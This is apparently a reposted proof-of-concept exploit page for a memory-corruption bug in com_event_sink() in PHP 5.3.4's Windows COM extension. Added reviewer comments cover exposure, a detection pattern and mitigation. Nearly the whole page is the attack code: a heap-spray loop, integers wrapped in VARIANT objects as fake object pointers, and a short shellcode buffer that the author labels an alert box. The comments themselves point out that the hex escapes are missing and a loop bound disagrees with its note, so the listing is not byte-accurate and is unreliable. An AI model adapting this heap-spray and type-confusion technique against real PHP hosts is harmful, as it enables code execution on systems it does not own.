
PHP 5.3.4 com_event_sink 0-Day

Posted on 10 October 2012

<?php
// PHP 5.3.4
//
// Proof-of-concept for a memory-corruption bug reached through com_event_sink()
// in PHP's Windows-only COM extension. The script's own banner says it was
// tested on PHP 5.3.4 on Windows XP Pro SP2.
//
// Reviewer notes (defensive reading):
//  - Exposure: the write-up linked in the banner is titled as a *local* exploit.
//    The script has to run as PHP code on the target host, so the risk sits
//    where untrusted parties can execute PHP (shared hosting, or after an
//    upload / code-injection flaw).
//  - Pattern to look for in code review or detection: a VARIANT constructed
//    from a bare integer and then passed to com_event_sink(), preceded by a
//    very large string built through repetition.
//  - Mitigation: PHP 5.3 is end-of-life; on hosts that run untrusted PHP, do
//    not expose the COM extension, or list com_event_sink in disable_functions.
//  - NOTE(review): as printed on this page the hex strings carry no backslash
//    escapes, so PHP would read them as plain text. The listing is presumably
//    not byte-accurate (likely lost in page extraction).
//
//$eip ="x44x43x42x41";
// The two values below are named after x86 registers by the author.
$eip= "x4bxe8x57x78";
$eax ="x80x01x8dx04";
$deodrant="";
// One unit of filler: the $eip.$eax pair repeated 0x80 (128) times.
$axespray = str_repeat($eip.$eax,0x80);
//048d0190
// Prints the byte length of a single filler unit.
echo strlen($axespray);
echo "PHP 5.3.4 WIN Com Module COM_SINK 0-day " ;
echo "By Rahul Sasi : http://twitter.com/fb1h2s " ;
echo "Exploit Tested on: Microsoft XP Pro 2002 SP2 " ;
echo "More Details Here: http://www.garage4hackers.com/blogs/8/web-app-remote-code-execution-via-scripting-engines-part-1-local-exploits-php-0-day-394/ " ;
//19200 ==4B32 4b00
// NOTE(review): 0x4B32 is 19250 decimal; 19200 is 0x4B00. The loop bound and
// the author's note above disagree, and the bound actually used is 0x4B32.
// The loop appends the filler unit to $deodrant on every pass, producing one
// very large string (appears to be a heap-spray buffer, going by the names).
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++)
{
$deodrant.=$axespray;
}
$terminate = "T";
// Four arrays each receive the large string; three of them get it with "T"
// appended, which yields a new string value rather than a shared one.
$u[] =$deodrant;
$r[] =$deodrant.$terminate;
$a[] =$deodrant.$terminate;
$s[] =$deodrant.$terminate;
//$vVar = new VARIANT(0x048d0038+$offset);
// This is what we control
// A VARIANT built from a plain integer (0x048d0000 + 180), not from a COM object.
$vVar = new VARIANT(0x048d0000+180);
// Labelled "alert box Shellcode" by the author; contents not verified here.
$buffer = "x90x90x90".
"xB9x38xDDx82x7Cx33xC0xBB".
"xD8x0Ax86x7Cx51x50xFFxd3";
$var2 = new VARIANT(0x41414242);
// com_event_sink() is documented to take a COM object, a sink object and an
// optional sink interface. Here the first two arguments are VARIANTs wrapping
// integers. Presumably the affected version uses the integer as an object
// pointer without checking the variant's type; confirm against the upstream fix.
com_event_sink($vVar,$var2,$buffer);
?>

 
